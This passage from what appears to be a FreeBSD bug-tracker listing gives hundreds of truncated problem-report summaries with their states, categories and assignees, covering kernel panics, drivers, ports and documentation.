vop_panic[vop_revoke]" panic o kern/124989 [mfi] mfi driver error - unexpected sense o usb/124980 usb [panic] kernel panic on detaching unmounted umass devi o kern/124973 geom [gjournal] [patch] boot order affects geom_journal con o gnu/124970 gdb(1): gdb crashes after setting hardware watchpoint o kern/124969 geom gvinum(8): gvinum raid5 plex does not detect missing s o kern/124963 alc [vm] [patch] old pagezero fixes for alc s kern/124933 pf [pf] [ip6] pf does not support (drops) IPv6 fragmented o kern/124908 rwatson [socket] kernel performs inadequate check for incorrec o kern/124904 net [fxp] EEPROM corruption with Compaq NC3163 NIC o i386/124902 i386 [i386] [patch] patch to fix VESA modes and allow 8bit o kern/124881 [devfs] [patch] [request] Add possibility to check whi o stand/124860 standards flockfile(3) doesn't work when the memory has been exh p kern/124853 gonzo [devfs.rules] [patch] devfs_ruleset_use may use freed o bin/124825 mlaier tcpdump(8) does not support pfsync(4) data o bin/124822 [editline] [patch] Editline's ed-search-{prev,next}-hi o ports/124798 brix [patch] irc/bitlbee is not doing SRV lookups for XMPP o www/124787 remko Internet Service Provider o www/124784 remko Please add to the commercial vendors list o kern/124777 usb [ucom] USB cua devices don't revert to tty devices whe o kern/124767 net [iwi] Wireless connection using iwi0 driver (Intel 220 o ports/124765 ume sysutils/gkrellm2 shows wrong number of users in proc o usb/124758 usb [rum] [panic] rum panics SMP kernel o kern/124754 [i915] i915 kernel module does not works with G965 o kern/124753 net [ieee80211] net80211 discards power-save queue packets o bin/124748 [patch] sh(1): sh -c 'exit -1' fails with "Illegal num o conf/124747 rc [patch] savecore can't create dump from encrypted swap o kern/124744 acpi [acpi] [patch] incorrect _BST result validation for To o bin/124739 edwin b64decode(1): "b64decode -r" fails to decode legal bas f ports/124727 multimedia multimedia/gstreamer-ffmpeg 0.10.4_1 configure fails a docs/124716 trhodes [patch] GEOM RAID1 handbook example only covers boot p o usb/124708 usb [panic] Kernel panic on USB KVM reattach o ports/124707 danfe [patch] audio/libgpod - add python support again o kern/124670 [ata] large file operation on RAID cause many GEOM err o bin/124669 growfs(8) does not work with RAID volume o kern/124667 scsi [amd] [panic] FreeBSD-7 kernel page faults at amd-scsi o conf/124641 [patch] new periodic script for checking for ports wit o ports/124639 kde kde audio/arts sound skipping on playback; non-artsd s f ports/124638 danfe x11/nvidia-driver - OpenGL and composite does not work o i386/124633 i386 [boot] [panic] 7.0 does not boot from CD f kern/124621 fs [ext3] [patch] Cannot mount ext2fs partition o usb/124604 usb [ums] Microsoft combo wireless mouse doesn't work o kern/124564 [kernel] [patch] add CPUID bits to ident phenom proces s misc/124541 cperciva portsnap: portsnap3.FreeBSD.org mirror on error for ov o bin/124517 [patch] cdcontrol(1) doesn't print all error messages o i386/124516 kmacy [xen] FreeBSD-CURRENT Xen Kernel Segfaults when config f ports/124501 multimedia multimedia/gstreamer-ffmpeg version 0.10.4_1 compile f o kern/124487 [procfs] [patch] Extending the PROCFS (/proc) filesyst f kern/124471 [lor] lock order reversal on kldload/kldunload dtracea o docs/124470 remko incomplete (and out of sync) glabel(8) manpage o docs/124469 remko incomplete nice(1) manpage o docs/124468 remko sticky(8) should be sticky(7) o kern/124464 [panic] Panic after showing login o misc/124452 7.0-RELEASE amd64 bootonly media fails to use DHCP bec o amd64/124432 amd64 [panic] 7.0-STABLE panic: invalbuf: dirty bufs o misc/124431 [build] [patch] minor revision of BDECFLAGS f bin/124424 fs [zfs] zfs(8): zfs list -r shows strange snapshots' siz f ports/124423 multimedia/mplayer detection of OSS Audio is faulty o kern/124412 acpi [acpi] power off error on Toshiba M40 laptop o bin/124409 fsck(8) requires exact entry for mountpoints when exec s ports/124404 vs net/pathchar coredumps o bin/124392 rink [patch] bootparamd(8) does not work on arm o kern/124389 [build] make installkernel fails with KMODDIR iff $(KM p misc/124385 mtm [build] [patch] usr.sbin/ngctl/main.c fails to compile o ports/124375 apache www/mod_auth_kerb doesn't compile against heimdal o kern/124364 pf [pf] [panic] Kernel panic with pf + bridge o bin/124353 cvsup(1): CVSup coredumps with Bus Error since install o bin/124349 [patch]: stat(1) should interpret st_flags as it does p bin/124342 mtm ggated(8): [patch] sbin/ggate/ggated/ggated.c fails to o kern/124341 net [ral] promiscuous mode for wireless device ral0 looses p kern/124334 mtm [libc] [patch] lib/libc/glob.c fails to compile under o ports/124321 kde x11/kdebase3 - KDE logins do not work with nsswitch LD o bin/124320 pam_radius(8): Login with ssh using pam_radius and a t o kern/124319 multimedia [snd_emu10k1] [regression] Cannot record from second c o kern/124294 geom [geom] gmirror(8) have inappropriate logic when workin o kern/124280 [nfs] [panic] FreeBSD 7/amd64 STABLE crash o ports/124258 des sysutils/munin-node creates $PREFIX/var/munin dir for o docs/124253 sam Broken command in the handbook for configuring a wirel p bin/124251 mtm [patch] add BUGS section to rcorder.8 with REQUIRE exp o conf/124248 rc [jail] [patch] add support for nice value for rc.d/jai o kern/124225 cokane [ndis] [patch] ndis network driver sometimes loses net o kern/124202 [aic] [patch] Add Adaptec 39320LPE to list of known de s kern/124174 [panic] Panic after installing audio/oss on an Asus A8 o kern/124164 [patch] Add SHA-256/512 hash algorithm to crypt(3) o kern/124160 net [libc] connect(2) function loops indefinitely o kern/124153 [panic] Fatal trap 12: page fault while in kernel mode o conf/124151 winbind is ignored in compat mode in nsswitch.conf(5) o amd64/124134 amd64 [kernel] The kernel doesn't follow the calling convent o kern/124130 geom [gmirror] [usb] gmirror fails to start usb devices tha o kern/124128 [puc] puc driver doesn't support VScom PCIex-800H 8-po o kern/124127 net [msk] watchdog timeout (missed Tx interrupts) -- recov o i386/124124 i386 [boot] [panic] Page fault while booting livefs iso of o bin/124119 edwin locate(1) doesn't check /etc/locate.rc for the default o kern/124111 i386_set_ldt(2): kernel says see i386_set_ldt; man pag o bin/124084 find(1): find -execdir does not prepend ./ to filename o kern/124064 [ar] [patch] cannot handle >16 serial number with Inte o bin/124057 sh(1) standard error redirection problem o bin/124052 [patch] adduser(8) throws errors when -f input file in o bin/124049 ntpd(8): ntpd is crashing at startup o kern/124021 net [ip6] [panic] page fault in nd6_output() o kern/123992 qingli [ecmp] ECMP does not remove/disable next-hop for downe p kern/123991 qingli [ecmp] ECMP balancing issues o i386/123990 i386 [boot] BTX halted on Thinkpad x60s o i386/123981 i386 [pxeboot] You can't usefully PXEBOOT the 7.0-RELEASE-i o kern/123980 [ata] [patch] Implement ATA UDMA speed limit (hw.ata.a p bin/123977 Segmentation fault in dialog(1) with ghostscript-gpl-n o usb/123969 usb [usb] Supermicro H8SMi-2 usb problem: port reset faile o kern/123968 net [rum] [panic] rum driver causes kernel panic with WPA. o kern/123962 geom [panic] [gjournal] gjournal (455Gb data, 8Gb journal), p kern/123961 net [vr] [patch] Allow vr interface to handle vlans o www/123946 bugmeister query-pr.cgi fails on shar-5.sh on ports/118906 o kern/123939 fs [msdosfs] corrupts new files o bin/123932 amd(8) core dumps while load high o ports/123927 devel/Boost and devel/boost-python ports naming genera o gnu/123921 [patch] cpio(1): cpio -oc bug with write_out_header() o kern/123904 [ipmi] ipmi(4) reports negative temperature values on o kern/123892 net [tap] [patch] No buffer space available o kern/123890 net [ppp] [panic] crash & reboot on work with PPP low-spee o kern/123887 [ata] PDC20262 does not support 48 bit DMA access o kern/123858 net [stf] [patch] stf not usable behind a NAT o kern/123855 philip moused(8): spontaneous mouse events f kern/123813 [panic] 7.0-STABLE i386 reboots weekly with panic: kme p bin/123807 imp [patch] timed(8) does not run on arm (incorrect getopt o kern/123796 net [ipf] FreeBSD 6.1+VPN+ipnat+ipf: port mapping does not o kern/123793 bz [ipsec] [patch] KAME IPSEC does not pass processed pac o kern/123778 vwe [panic] [ffs] [msgs] server reboots when running 130.c o i386/123775 [dri] DRI Broken under freebsd7-stable/i386 o bin/123774 [patch] kdump(1): time_t printing issues o ports/123769 luigi Modules compiled using devel/linux-kmod-compat can't b o kern/123758 gnn [panic] panic while restarting net/freenet6 o kern/123755 dfr [nfs] fstat(1) fails to return ESTALE with rename()d f p kern/123754 mav [ata] [panic] atacontrol(8): atacontrol reinit causing f kern/123742 [acpi] [panic] kernel panic when boot with acpi disabl o kern/123735 [panic] 7.0-STABLE kernel panic "AP #1 (PHY# 1) failed o conf/123734 rc [patch] Chipset VIA CX700 requires extra initializatio o usb/123714 usb [usb] [panic] Panic when hald-storage-probe runs with o bin/123703 [patch] timed(8): qualify bad diagnostic in src/usr.sb o bin/123693 [patch] burncd(8): workaround for busy cd-writer while o usb/123691 usb usbd(8): usbd hangs o usb/123690 usb [usb] [panic] Panic on USB device insertion when usb l o stand/123688 standards POSIX standard changes in unistd.h and grp.h o kern/123674 scsi [ahc] ahc driver dumping o kern/123666 scsi [aac] attach fails with Adaptec SAS RAID 3805 controll o bin/123644 [patch] [sysctl] Allow sysctl(8) to ignore unknown OID o bin/123635 jot(1) handles 'stuttering sequences' and reversed ran o kern/123634 [vm] [panic] kernel panic with FreeBSD 7-STABLE o bin/123633 net ifconfig(8) doesn't set inet and ether address in one o kern/123630 geom [patch] [gmirror] gmirror doesnt allow the original dr o kern/123629 [panic] Fatal trap 12: page fault while in kernel mode f kern/123617 net [tcp] breaking connection when client downloading file o usb/123611 usb [usb] BBB reset failed, STALLED from Imation/Mitsumi U o ports/123608 glewis java/jdk16 port fails to build o kern/123603 net [tcp] tcp_do_segment and Received duplicate SYN o kern/123587 bz [ipsec] IPCOMP broken in IPSEC (FAST_IPSEC for RELENG_ o bin/123574 daichi [unionfs] df(1) -t option destroys info for unionfs (a o ports/123570 itetcu audio/cpige version 1.5 coredumps if new .conf entries p kern/123568 gnn [lo] loopback interface error (don`t ask) f sparc/123566 kmacy [zfs] zpool import issue: EOVERFLOW f kern/123563 yongari [re] watchdog timeout o amd64/123562 amd64 [install] FreeBSD amd64 not installs o kern/123559 net [iwi] iwi periodically disassociates/associates [regre o java/123555 java linux-sun-jdk15, linux-sun-jdk16 produce a coredump o misc/123554 [build] buildworld with TARGET_ARCH=i386 fails on amd6 o bin/123553 [patch] Prevent indent(1) from splitting unrecognized o conf/123551 [patch] [periodic] /etc/periodic/daily/440.status-mail s ports/123526 gerald emulators/wine crashes with many ZFS configurations o amd64/123520 amd64 [ahd] unable to boot from net while using ahd p kern/123518 [patch] src/sys/kern.mk fails to disable -msse3 for am o conf/123516 [periodic] Daily Security Logs Not Reporting Failed Lo o usb/123509 usb [umass] continuous reset Samsung SGH-G600 phone f usb/123508 vwe [umass] [msdosfs] damaged files (mp3,txt , etc) on fla o docs/123484 edwin [patch] teach pxeboot.8 about ISC DHCP v3 a ports/123468 itetcu mail/postgrey: information leak, privacy issue o bin/123465 net [ip6] route(8): route add -inet6 -interfac o kern/123463 net [ipsec] [panic] repeatable crash related to ipsec-tool o i386/123462 i386 clock is too fast o amd64/123456 amd64 fstat(1): /usr/bin/fstat shows error messages and hang o misc/123452 mailman trustedbsd-audit email list not archiving o kern/123429 net [nfe] [hang] "ifconfig nfe up" causes a hard system lo o bin/123418 [patch] du(1): add -g (Gbyte) option to du(1) + manpag a ports/123410 dinoex graphics/pornview segmentation fault p kern/123399 [build] RELENG_7 kernel does not compile if IPV6 suppo o kern/123392 [vfs] [lor] lock order reversal in vfs o kern/123359 [hang] Install hangs before sysinstall a kern/123358 [ipfw] ipfw add 1000 allow IP from any to any doesn't o usb/123352 usb [usbdevs] [patch] Add Option GTMAX3.6/7.2 and Quallcom o usb/123351 usb [usbdevs] [patch] Add Reiner SCT cyberJack, Omnikey [2 o kern/123347 net [bge] bge1: watchdog timeout -- linkstate changed to D o conf/123330 net [nsswitch.conf] Enabling samba wins in nsswitch.conf c p bin/123329 phk [patch] usage strings for fifolog_create(1) and fifolo s bin/123304 sysinstall(8): missing sensible and user friendly prog o kern/123287 [devfs] structure used after freed in destroy_devl() i o kern/123279 thompsa [lagg] order of operations dependancy in bringing up l f amd64/123275 amd64 [cbb] [pcmcia] cbb/pcmcia drivers on amd64 failure [re o kern/123256 net [wpi] panic: blockable sleep lock with wpi(4) o misc/123240 [nanobsd] [patch] rerunning nanobsd.inc.sh fails becau o bin/123237 randi sysinstall(8): [patch]: sysinstall(8) -- remove dummy o conf/123222 rc [patch] Add rtprio(1)/idprio(1) support to rc.subr(8). o ports/123185 portmgr [patch] Mk/bsd.port.mk - Add extended description to O o kern/123177 secteam [random] [patch] arc4rand(9) produces the same sequenc f kern/123172 net [bce] Watchdog timeout problems with if_bce o kern/123166 yongari [re] CARP messages filtered by Realtek driver on > 6.2 o kern/123160 net [ip] Panic and reboot at sysctl kern.polling.enable=0 o misc/123156 [build] [patch] make.conf update to "make update" sect o misc/123155 [build] [patch] src/Makefile.inc1 bug: remove obsolete o ports/123154 python New port: devel/py-yapps2 (an easy-to-use parser gener p kern/123147 remko [ti] [patch] ti(4) doesn't use mii, but kernel configs o kern/123140 [smp] SMP boot causes slow KB, ATA drives not detected f ports/123137 x11 x11/libX11: missing ru_RU.UTF-8 locale o kern/123122 geom [geom] GEOM / gjournal kernel lock o conf/123119 ipfw [patch] rc script for ipfw does not handle IPv6 o kern/123095 [libc] sendfile(2): Suspected sendfile data corruption p bin/123069 [patch] ps(1): invalid value of 'elapsed' field in ps o ports/123068 sysutils/bubblemon2 bubblemon-dockapp: error extractin f kern/123066 vanhu [ipsec] [panic] kernel trap with ipsec f kern/123045 gonzo [ng_mppc] ng_mppc_decompress - disabling node o ports/123042 portmgr [patch] bsd.port.mk - Fix USE_LDCONFIG when used with o kern/123039 acpi [acpi] ACPI AML_BUFFER_LIMIT errors during boot f docs/123038 trhodes [patch] update to projects/c99/index.sgml p docs/123035 trhodes [patch] bugs in refuse.README a bin/123021 [patch] mount(8): mount -p shows incorrect mount optio o bin/123015 brooks [patch] rc.conf(8): implement automated creation of /e o kern/123013 [vm] panic "Bad tailq NEXT(%p->tqh_last) != NULL" o usb/122992 usb [umass] [patch] MotoROKR Z6 Phone not recognised by um o ports/122991 glewis java/jdk16 does not compile from ports o kern/122989 net [swi] [panic] 6.3 kernel panic in swi1: net o ports/122974 dougb [PATCH] dns/bind94: add DLZ config options f amd64/122970 yongari [re] [hang] RealTek 8168/8111B couses system crash o conf/122968 [md] md swapfile multiplication after init 1 o kern/122963 ipfw [ipfw] tcpdump does not show packets redirected by 'ip o usb/122956 usb [ubsa] [patch] add support for Novatel Wireless XU870 o kern/122954 net [lagg] IPv6 EUI64 incorrectly chosen for lagg devices o kern/122951 firewire [firewire] video-transfer via fwcontrol triggers a pan o usb/122936 usb [ucom] [ubsa] Device does not receive interrupt o kern/122928 net [em] interface watchdog timeouts and stops receiving p o threa/122923 threads 'nice' does not prevent background process from steali f ports/122922 multimedia [patch] multimedia/ffmpeg text output is mangled f kern/122915 [smp] Incorrect system cpu load o usb/122905 usb [ubsa] [patch] add Huawei E220 to ubsa f ports/122890 stas Update port: www/ocaml-net (revision, added options) o kern/122888 fs [zfs] zfs hang w/ prefetch on, zil off while running t a i386/122887 i386 [panic] [atkbdc] 7.0-RELEASE on IBM HS20 panics immed o conf/122883 [patch] login class for ukrainian users accounts f kern/122880 vwe [hang] Kernel lock-up during 7.0 installation disc boo o ports/122877 portmgr [patch] Mk/bsd.port.mk - Show all pkg-message files f kern/122839 net [multicast] FreeBSD 7 multicast routing problem o kern/122838 [devfs] devfs doesn't handle complex paths (like zvol/ o ports/122830 x11 x11/xorg: Error in I830WaitLpRing() o usb/122819 usb [usb] [patch] Patch to provide dynamic additions to th o usb/122813 usb [udbp] [request] udbp driver should be removed in favo p conf/122811 brian [periodic] [patch] the daily_clean_disks scripts walks o ports/122801 skv databases/virtuoso, databases/firebird20-client, datab p kern/122794 net [lagg] Kernel panic after brings lagg(8) up if NICs ar o kern/122782 amd64 [modules] accf_http.ko kernel module is not loadable o kern/122780 net [lagg] tcpdump on lagg interface during high pps wedge o kern/122773 pf [pf] pf doesn't log uid or pid when configured to o kern/122772 net [em] em0 taskq panic, tcp reassembly bug causes radix o kern/122749 [cardbus] cardbus problem on IBM Thinkpad T60P o kern/122743 net [mbuf] [panic] vm_page_unwire: invalid wire count: 0 o kern/122738 geom [geom] gmirror list "losts consumers" after gmirror de o kern/122697 net [ath] Atheros card is not well supported o amd64/122695 amd64 [cpufreq] Lack of cpufreq control using amd64 eith cor o kern/122685 net It is not visible passing packets in tcpdump(1) a kern/122683 [sio] [freeze] access to non-existent sio port /dev/cu o kern/122670 [ata] [patch] broken acd_get_progress = ioctl CDRIOCGE p bin/122659 stefanf [patch] sh(1) long arithmetics broken on certain archi o bin/122652 [patch] du(1) support for inode count f i386/122644 i386 [panic] on-boot mount /tmp kernel dump o ports/122639 danfe audio/gtkpod - Confilicting include files break builds o amd64/122624 amd64 unusable minimal installation of FreeBSD-7.0 o i386/122623 i386 [build] [patch] bsd.cpu.mk doesn't handle opteron/athl o usb/122621 usb [new driver] [patch] New driver for Sierra Wireless 3G o ports/122616 python databases/py-pyPgSQL - apply bytea escape bug patch in o kern/122615 [devfs] [panic] occasional crash/boot while running Xo o i386/122602 i386 [build] i386/conf/PAE does not compile on RELENG_7 a kern/122597 thompsa [iwi] Intel iwi fails after 3 - 4 hours of use"firmwar o kern/122588 [lor] 4 Lock Order Reversal a kern/122565 bz [ipsec] [ip6] Possible memory overwrite for IPv6 IPsec o kern/122563 bz [ipsec] KEY_FREESAV() in FreeBSD-Release7.0 o kern/122562 bz [ipsec] IPsec AH tunneled packet mis handling? o kern/122551 net [bge] Broadcom 5715S no carrier on HP BL460c blade usi o amd64/122549 amd64 7.0-RELEASE-amd64-bootonly.iso doesn't work w/ serial o usb/122547 usb [ehci] USB Printer not being recognized after reboot o usb/122539 usb [ohci] [panic] AnyDATA ADU-E1000D - kernel panic: ohci o ports/122524 demon www/links1 uses 7-bit us-ascii codepage only when usin o bin/122522 kensmith sysinstall(8) doesn't unmount CD for multi-CD package o bin/122519 [patch] ppp(8): ppp provides deficient DNS info o java/122513 java native JDKs unbuildable with Linux ones f kern/122493 gavin [boot] BTX Halted - Cause is Promise Fastrack SATA PCI o usb/122483 usb [panic] [ulpt] Repeatable panic in 7.0-STABLE o bin/122479 openssl(1): openssl SEGV with DTLS o conf/122477 rc [patch] /etc/rc.d/mdconfig and mdconfig2 are ignoring o amd64/122468 amd64 Compile problems after upgrading to 7.0 f kern/122462 [boot] Fails to boot from an usb harddrive o conf/122445 Unable to override EDITOR in /etc/profile due to defau o ports/122422 mbr Update port: mail/up-imapproxy fix rc.d script to actu f kern/122415 geom [geom] UFS labels are being constantly created and rem o kern/122380 fs [ffs] ffs_valloc:dup alloc (Soekris 4801/7.0/USB Flash o kern/122373 jfv [em]: unable to recieve on em 82542 w/o promisc f kern/122368 [ata]: Failure to support SATA/PATA drives on 6.3 and f ports/122341 portmgr Mk/bsd.port.mk: deprecate X11BASE use o ports/122333 gavin net/arping - patch to lookup for interface and src ip, o kern/122331 [wpa] [panic] 7.0-RELEASE && panic in Wifi area with W o kern/122321 [mpt] Hitachi SCSI drive can't be written to o kern/122319 net [wi] imposible to enable ad-hoc demo mode with Orinoco o ports/122305 multimedia multimedia/gstreame - gst-inspect-0.10 hangs when chec o kern/122301 [build] kernel compile with "options DEBUG_LOCKS" fail f misc/122300 kensmith [build] [patch] SEPARATE_LIVEFS arch dependent set but o ports/122299 luigi multimedia/linux-ov511-kmod fails to build on FreeBSD o kern/122291 [ata] acd0: timeout waiting to issue command / acd0: e o kern/122290 net [netgraph] [panic] Netgraph related "kmem_map too smal o kern/122288 [md] [patch] mdconfig(8) returning negative unit numbe o bin/122271 [patch] usr.bin/xinstall - Add support for -D option ( f kern/122252 net [ipmi] [bge] IPMI problem with BCM5704 (does not work o bin/122235 [psm] freebsd-7.0 moused(8) problems with ALPS GlidePo o kern/122195 net [ed] Alignment problems in if_ed o amd64/122174 amd64 [panic] 7.0 no longer includes "device atpic" so fails o kern/122173 fs [zfs] [panic] Kernel Panic if attempting to replace a o bin/122172 fs [fs]: amd(8) automount daemon dies on 6.3-STABLE i386, o conf/122170 rc [patch] [request] New feature: notify admin via page o o i386/122148 i386 [irq] interrupt storm on 7.0 [regression] s kern/122145 sam [build] error while compiling with device ath_rate_amr p bin/122137 matteo [patch] Have crontab(1) use snprintf instead of sprint o ports/122122 mi print/lyx crashes if devel/boost is compiled with thre o usb/122119 usb [umass] umass device causes creation of daX but not da o kern/122109 piso [ipfw] ipfw nat traceroute problem o kern/122086 multimedia [sound] maestro sound driver is working, but mixer ini f kern/122082 rwatson [tcp] NULL pointer dereference in in_pcbdrop p bin/122070 matteo [patch] crontab(1): Zero out pw_passwd in crontab o kern/122067 geom [geom] [panic] Geom crashed during boot f kern/122065 bz [ipsec] [gre] gre over ipsec not working f kern/122061 [libc] dlsym(3) is very slow when a symbol cannot be f o kern/122058 net [em] [panic] Panic on em1: taskq f docs/122052 doc minor update on handbook section 20.7.1 p stand/122051 davidxu Add posix_spawn(3) o kern/122047 fs [ext2fs] [patch] incorrect handling of UF_IMMUTABLE / o kern/122046 [psm] Synaptics touchpad freezes (psm0: lost interrupt p kern/122045 [ata] [panic] reiniting detached ata channel kills the o bin/122043 [patch] du(1) does not support byte-count-based report o kern/122038 fs [tmpfs] [panic] tmpfs: panic: tmpfs_alloc_vp: type 0xc o conf/122037 [patch] add rsync example for inetd.conf o kern/122033 net [ral] [lor] Lock order reversal in ral0 at bootup [reg f ports/122027 itetcu net-mgmt/zabbix - Fix several zabbix-server crashes o usb/122025 usb [uscanner] [patch] uscanner does not attach to Epson R o kern/122014 pf [pf] [panic] FreeBSD 6.2 panic in pf o kern/121983 net [fxp] fxp0 MBUF and PAE f kern/121962 [snd_emu10k1] [panic] Kernel panics with device pollin o ports/121958 portmgr add sysutils/cdrkit to USE_CDRTOOLS logic o docs/121952 doc Handbook chapter on Network Address Translation wrong o stand/121921 standards [patch] Add leap second support to at(1), atrun(8) o kern/121917 [boot] [patch] Broken boot on Asus P4P800-VM after upg o kern/121907 [request] output to console can obscure other messages o kern/121904 wrong CPU description in dmesg output for AMD Athlon X o i386/121903 i386 [ips] [boot] can't boot on IBM x235 ServeRaid 6M [regr s ports/121902 gabor [PATCH] textproc/ispell add OPTIONS o kern/121899 [ar] [patch] Drive detached from Intel Matrix RAID and o bin/121898 fs [nullfs] pwd(1)/getcwd(2) fails with Permission denied o kern/121897 [patch] realpath(3) segmentation fault o bin/121895 net [patch] rtsol(8)/rtsold(8) doesn't handle managed netw o kern/121872 net [wpi] driver fails to attach on a fujitsu-siemens s711 o docs/121871 doc ftpd does not interpret configuration files as documen s conf/121812 [ip6] [request] ipv6_gateway_enable incorrectly disabl a kern/121809 kris unable to umount s kern/121807 ipfw [request] TCP and UDP port_table in ipfw p conf/121783 cperciva [patch] freebsd-update(8) upgrade overwrites device.hi o bin/121779 fs [ufs] snapinfo(8) (and related tools?) only work for t s kern/121774 net [swi] [panic] 6.3 kernel panic in swi1: net o kern/121770 fs [zfs] ZFS on i386, large file or heavy I/O leads to ke o kern/121768 [cpufreq] cpufreq module RELENG_6 -> 7 regressions on o kern/121761 [cardbus] [dc] a cardbus dc0 causes a system freeze wh o kern/121760 [pccard] [cardbus] an ed1 network pccard's CIS wasn't o kern/121759 [cardbus] [dc] cardbus dc0 initialization failure at o o usb/121755 usb [ohci] [patch] Fix panic after ohci/uhub cardbus devic f ports/121745 vd misc/ossp-uuid - PostgreSQL contrib ossp-uuid crashes o usb/121734 usb [ugen] ugen HP1022 printer device not working since up p docs/121721 trhodes telnetd(8) not describing -X authentication types f kern/121720 thompsa [wpi] wpi doesnt work if kernel has options SCHED_ULE o usb/121708 usb [keyboard] nforce 650i mobo w/ usb keyboard infinite k o kern/121706 net [netinet] [patch] "rtfree: 0xc4383870 has 1 refs" emit o kern/121704 pf [pf] PF mangles loopback packets f kern/121703 [ata] Cannot fdisk/gpt with 1TB SATA disk and 965QM Mo f i386/121699 linimon [boot] can't boot on MSI K9N Ultra o java/121692 java java/jdk16: Java 1.5 1.5.0.14p8 crashes in RMI TCP Con o ports/121688 kde [patch] editors/koffice-kde3: several depencancy fixes o kern/121686 [ata] bogus CHS to LBA mapping in (at least) ata o sparc/121676 scsi [iscsi] iscontrol do not connect iscsi-target on sparc o i386/121675 i386 [ata] incorrect fallback to udma33 with CF memory inst o ports/121672 wes [Patch] mail/mimedefang: opt out of clamav use o bin/121671 bushman [patch] nscd(8) prints needless banner f kern/121660 jkoshy [hwpmc] [patch] hwpmc(4) incorrectly handles PMC sampl o kern/121656 [libc] [patch] telldir(3) issues o kern/121642 bz [ipsec] [gif]: When using IPSec, tcpdump shows non-dec o kern/121624 net [em] [regression] Intel em WOL fails after upgrade to o amd64/121590 amd64 [est] [p4tcc] [acpi_perf] setting dev.cpu.0.freq somet o docs/121585 doc [handbook] Wrong multicast specification o ports/121573 cy security/krb5 (MIT Kerberos) generates non-working ksu f kern/121572 [panic] when downloading from ftp system crash/rebooti o stand/121568 standards [patch] ln(1): wrong "ln -s" behaviour f ports/121567 cperciva sysutils/est: est cpufreq not work on freebsd/amd64 o kern/121566 rc [nfs] [request] [patch] ethernet iface should be broug o docs/121565 doc dhcp-options(5) manpage incorrectly formatted omitting o kern/121559 geom [patch] [geom] geom label class allows to create inacc o kern/121556 kientzle [libarchive] ISO9660 decompression extension unsupport o kern/121555 net [panic] Fatal trap 12: current process = 12 (swi1: net f kern/121550 [drm] Can't config graphics for ATI Radeon Xpress 200M o i386/121549 i386 [nfe]: nfe interface locks up during rc.conf initializ o docs/121545 brd Update Handbook Section 29.3 to include wlan_scan_sta o bin/121542 krion [patch] teach pkg_add(1) to accept PACKAGEROOT and PAC s docs/121541 doc [request] no man pages for wlan_scan_ap o sparc/121539 [ata] Interrupt storm booting 7.0-R/sparc64 on ultra5 o kern/121534 darrenr [ipl] [nat] FreeBSD Release 6.3 Kernel Trap 12: o kern/121521 [ata] [patch] add VIA CX700M2 chipset to ata driver p bin/121512 mtm [sysctl] [patch] sysctl(8) should return 1 if the user o kern/121504 acpi [patch] Correctly set hw.acpi.osname on certain machin o bin/121503 sysinstall(8): 7.0 upgrade doesn't let me mount all of o bin/121502 [patch] option -P appears to be broken in restore(8) s p docs/121490 brueffer [patch] Multiple typos ("in in") in /usr/src files s kern/121485 vwe [vm] panic with 7.0-RELEASE [regression] o kern/121481 geom [gmirror] data rot on disk with gmirror o usb/121474 usb [cam] [patch] QUIRK: SAMSUNG HM250JI in LaCie usb hard o ports/121472 perl Loading perl scripts causes irc/xchat segmentation fau o kern/121461 [ata] SATA Hard disks are not detected on SiS 180/181 f kern/121454 acpi [pst] Promise SuperTrak SX6000 does not load during bo o kern/121443 net [gif] [lor] icmp6_input/nd6_lookup o docs/121440 keramida rc(8) and rcorder(8) unclear about PROVIDE keyword bei o amd64/121439 acpi [boot] Installation of FreeBSD 7.0 fails: ACPI problem o kern/121437 net [vlan] Routing to layer-2 address does not work on VLA o usb/121426 usb [patch] [uscanner] add HP ScanJet 3570C o bin/121424 doc [patch] [ipfw] Rectify ambiguous English in manual o ports/121420 java java/jdk16: Java applet fails to find class under fire o ports/121416 java java/jdk15 can't build if BIN environment variable is o ports/121413 portmgr [patch] bsd.port.mk: introduce USE_LZMA for lzma-compr a power/121407 ppc [panic] Won't boot up; strange error message. o kern/121396 [ata] 7.0 fails on mcp55 sata controller [regression] f kern/121394 sam [ath] FreeBSD access point (ath0) fails 100% of the ti f www/121391 www Please add us on the ISP pages... o kern/121385 daichi [unionfs] unionfs cross mount -> kernel panic o kern/121382 ipfw [dummynet]: 6.3-RELEASE-p1 page fault in dummynet (cor o kern/121373 bz [ipsec] New IPSEC & IPV6 & AH+ESP Broken o kern/121371 secteam execv undesired use to change a processes credentials o bin/121366 fs [zfs] [patch] Automatic disk scrubbing from periodic(8 o kern/121364 geom [gmirror] Removing all providers create a "zombie" mir o bin/121359 net [patch] ppp(8): fix local stack overflow in ppp o kern/121350 [ata] [panic] initiate_write_inodeblock_ufs2: already o ports/121347 hrs print/teTeX-base and print/texinfo install files in th o ports/121338 ahze print/gutenprint-foomatic - Unable to create the Fooma o kern/121337 [radeon] [panic] Kernel panic on 7.0-RELEASE using ati o threa/121336 threads lang/neko threading ok on UP, broken on SMP (FreeBSD 7 o kern/121322 [panic] 'panic: spin lock held too long' on reboot o docs/121312 doc RELNOTES_LANG breaks release if not en_US.ISO8859-1 o ports/121311 ume sysutils/gkrellm2: gkrellmd won't connect to mbmon, do o kern/121298 net [em] [panic] Fatal trap 12: page fault while in kernel f kern/121294 [panic] kernel panic pcpu.h or 0x00000000 in ?? () o bin/121287 dd(1) ignores any conversions if 'bs' was specified o usb/121275 usb [boot] [panic] FreeBSD fails to boot with usb legacy s o kern/121274 darrenr [panic] Panic in ether_input() with different NIC's. o ports/121270 joerg Upgrade devel/avr-gdb to a more recent version f ports/121259 itetcu New port: net/openamq OpenAMQ is a complete AMQP messa o i386/121258 i386 [boot] FreeBSD 6.3 / 7.0 boot problem [regression] o kern/121257 net [tcp] TSO + natd -> slow outgoing tcp traffic o bin/121243 des [patch] passwd(1) patch for usage with PAM/LDAP o arm/121242 ticso [ate] [patch] Promiscuous mode of if_ate (arm) doesn't o ports/121235 wosch ports/sysutils/socket registers signal handler for SIG o kern/121234 [vm] vm_fault: fault on nofault o usb/121232 usb [usb] [panic] USB CardBus card removal causes reboot s p usb/121184 usb [uipaq] [patch] add ids from linux ipaq driver (plus a p bin/121182 [patch] newfs_msdos(8) should supports devices without o kern/121181 net [panic] Fatal trap 3: breakpoint instruction fault whi o kern/121174 [ral] if_ral loses performance in FreeBSD 7 (RELENG_7) o docs/121173 doc [patch] mq_getattr(2): mq_flags mistakenly described a o usb/121169 usb [umass] Issues with usb mp3 player o bin/121165 pkg_add(1) prints a weird message: PKG_TMPDIR environm p kern/121156 multimedia [sound] [patch] Turn on inverted external amplifier se o i386/121148 gavin 